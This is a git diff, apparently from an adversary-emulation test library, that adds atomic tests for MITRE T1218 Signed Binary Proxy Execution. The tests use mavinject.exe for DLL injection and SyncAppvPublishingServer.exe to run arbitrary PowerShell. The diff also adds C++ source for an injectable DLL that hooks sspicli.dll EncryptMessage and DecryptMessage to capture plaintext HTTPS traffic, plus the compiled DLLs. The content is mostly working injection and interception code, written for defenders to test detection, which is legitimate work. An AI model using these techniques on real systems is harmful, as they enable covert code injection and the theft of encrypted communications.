diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml new file mode 100644 index 00000000..aba47707 --- /dev/null +++ b/atomics/T1218/T1218.yaml @@ -0,0 +1,42 @@ +--- +attack_technique: T1218 +display_name: Signed Binary Proxy Execution + +atomic_tests: +- name: mavinject - Inject DLL into running process + description: | + Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. + + supported_platforms: + - windows + + input_arguments: + dll_payload: + description: DLL to inject + type: Path + default: C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll + process_id: + description: PID of process receiving injection + type: string + default: 1000 + executor: + name: command_prompt + command: | + mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} + +- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code + description: | + Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. + + supported_platforms: + - windows + + input_arguments: + powershell_code: + description: PowerShell code to execute + type: string + default: Start-Process calc.exe + executor: + name: command_prompt + command: | + SyncAppvPublishingServer.exe "n; #{powershell_code}" diff --git a/atomics/T1218/src/T1218.cpp b/atomics/T1218/src/T1218.cpp new file mode 100644 index 00000000..701fe2a4 --- /dev/null +++ b/atomics/T1218/src/T1218.cpp @@ -0,0 +1,147 @@ +#define SECURITY_WIN32 //Define First Before Imports. + +#include +#include +#include //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies + +FARPROC fpEncryptMessage; //Pointer To The Original Location +BYTE bSavedByte; //Saved Byte Overwritten by 0xCC - + +FARPROC fpDecryptMessage; //Pointer To The Original Location +BYTE bSavedByte2; //Saved Byte Overwritten by 0xCC - + + +// Original Idea/Reference Blog Post Here: +// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 +// PoC by Casey Smith @subTee +// From PowerShell +// mavinject.exe $pid /INJECTRUNNING C:\AtomicTests\AtomicSSLHookx64.dll +// curl https://www.example.com +// Should Hook and Display Request/Response from HTTPS + + + + +BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) { + DWORD dwOldProt = 0; + if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) { + return FALSE; + } + MoveMemory(fpFunc, b, size); + + return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt); +} + +//TODO, Combine HOOK Function To take 2 params. DLL and Function Name. +VOID HookFunction(VOID) { + fpEncryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "EncryptMessage"); + if (fpEncryptMessage == NULL) { + return; + } + + bSavedByte = *(LPBYTE)fpEncryptMessage; + + const BYTE bInt3 = 0xCC; + if (WriteMemory(fpEncryptMessage, &bInt3, sizeof(BYTE)) == FALSE) { + ExitThread(0); + } +} + +VOID HookFunction2(VOID) { + fpDecryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "DecryptMessage"); + if (fpDecryptMessage == NULL) { + return; + } + + bSavedByte2 = *(LPBYTE)fpDecryptMessage; + + const BYTE bInt3 = 0xCC; + if (WriteMemory(fpDecryptMessage, &bInt3, sizeof(BYTE)) == FALSE) { + ExitThread(0); + } +} + +SECURITY_STATUS MyEncryptMessage( + PCtxtHandle phContext, + ULONG fQOP, + PSecBufferDesc pMessage, + ULONG MessageSeqNo +) +{ + + char* buffer = (char*)((DWORD_PTR)(pMessage->pBuffers->pvBuffer) + 0x29); //Just Hardcode for PoC + + ::MessageBoxA(NULL, buffer, "MITM Intercept", 0); + + if (WriteMemory(fpEncryptMessage, &bSavedByte, sizeof(BYTE)) == FALSE) { + ExitThread(0); + } + + SECURITY_STATUS SEC_EntryRet = EncryptMessage(phContext, fQOP, pMessage, MessageSeqNo); + HookFunction(); + return SEC_EntryRet; +} + +SECURITY_STATUS MyDecryptMessage( + PCtxtHandle phContext, + PSecBufferDesc pMessage, + ULONG MessageSeqNo, + ULONG fQOP +) +{ + + if (WriteMemory(fpDecryptMessage, &bSavedByte2, sizeof(BYTE)) == FALSE) { + ExitThread(0); + } + + SECURITY_STATUS SEC_EntryRet = DecryptMessage(phContext, pMessage, MessageSeqNo, &fQOP ); + + char* buffer = (char*)(pMessage->pBuffers->pvBuffer); + + ::MessageBoxA(NULL, buffer, "MITM Intercept", 0); + + HookFunction2(); + return SEC_EntryRet; +} + + +LONG WINAPI +MyVectoredExceptionHandler1( + struct _EXCEPTION_POINTERS *ExceptionInfo +) +{ + UNREFERENCED_PARAMETER(ExceptionInfo); +#ifdef _WIN64 + if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpEncryptMessage) { + ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyEncryptMessage; + } + + if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpDecryptMessage) { + ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyDecryptMessage; + } + +#else + if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpEncryptMessage) { + ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyEncryptMessage; + } + + if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpDecryptMessage) { + ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyDecryptMessage; + } + +#endif + return EXCEPTION_CONTINUE_SEARCH; +} + +BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) { + switch (fdwReason) { + case DLL_PROCESS_ATTACH: + AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)MyVectoredExceptionHandler1); + HookFunction(); + HookFunction2(); + ::MessageBoxA(NULL, "Locked and Loaded!", "Boom!", 0); + break; + } + + return TRUE; +} diff --git a/atomics/T1218/src/Win32/T1218.dll b/atomics/T1218/src/Win32/T1218.dll new file mode 100644 index 00000000..660242c1 Binary files /dev/null and b/atomics/T1218/src/Win32/T1218.dll differ diff --git a/atomics/T1218/src/x64/T1218.dll b/atomics/T1218/src/x64/T1218.dll new file mode 100644 index 00000000..91bffa6a Binary files /dev/null and b/atomics/T1218/src/x64/T1218.dll differ